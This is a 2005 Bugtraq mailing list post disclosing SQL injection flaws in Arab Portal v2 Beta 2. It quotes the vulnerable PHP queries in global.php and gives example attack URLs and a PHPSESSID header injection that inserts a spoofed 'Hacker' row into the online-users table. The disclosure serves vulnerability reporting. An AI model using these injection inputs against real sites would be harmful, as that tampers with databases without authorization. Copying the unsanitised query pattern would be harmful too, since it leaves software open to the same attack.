Bugtraq mailing list archives
Arab Portal v2 Beta2 SQL Injections
From: stranger-killer () hotmail com
Date: 11 Dec 2005 15:24:49 -0000
Hi .. This is small bug for Arab Portal System v2 Beta 2 File name :- global.php Remote:- Yes Credit :- Devil-00 Messenger :- <devil-00 () s4a cc> E-Mail :- <stranger-killer () hotmail com> //--# Devil SQL Injection /* This SQL can do when :- magic_quotes_gpc = Off $session_id << Bad Var Attacking :- http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5 Edit HTTPHeader [ PHPSESSID ] = SQL Injection */ $apt->query("DELETE FROM rafia_online WHERE onlineSID ='$session_id' or timestamp < $timeout"); #--// //--# Devil SQL Injection /* Devil-00 .. devil-00 () s4a cc This SQL can do when :- magic_quotes_gpc = Off $REQUEST_URI << Bad Var $session_id << Bad Var Attacking URL :- http://127.0.0.1/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5&','010','Hacker','0')/* SQL Well Be INSERT INTO rafia_online (timestamp,onlineip, onlinefile,onlinepage,onlineSID,user_online,useronlineid) VALUES ('1134309930','127.0.0.1','/Arab_Portal_v.2.0_beta_2/link.php', '/Arab_Portal_v.2.0_beta_2/link.php?action=list&cat_id=5','0202020','Hacker','0')/*','6038e5a71794874f0130af05ec05501b','Guest','0') Onlines :- Guest يتواجد في --- Hacker يتواجد في --- */ $apt->query("INSERT INTO rafia_online (timestamp, onlineip, onlinefile, onlinepage, onlineSID, user_online, useronlineid) VALUES ('$timestamp', '$online_ip', '$PHP_SELF', '$REQUEST_URI', '$session_id', '$useronline', '$useronlineid')"); #--//
Current thread:
- Arab Portal v2 Beta2 SQL Injections stranger-killer (Dec 12)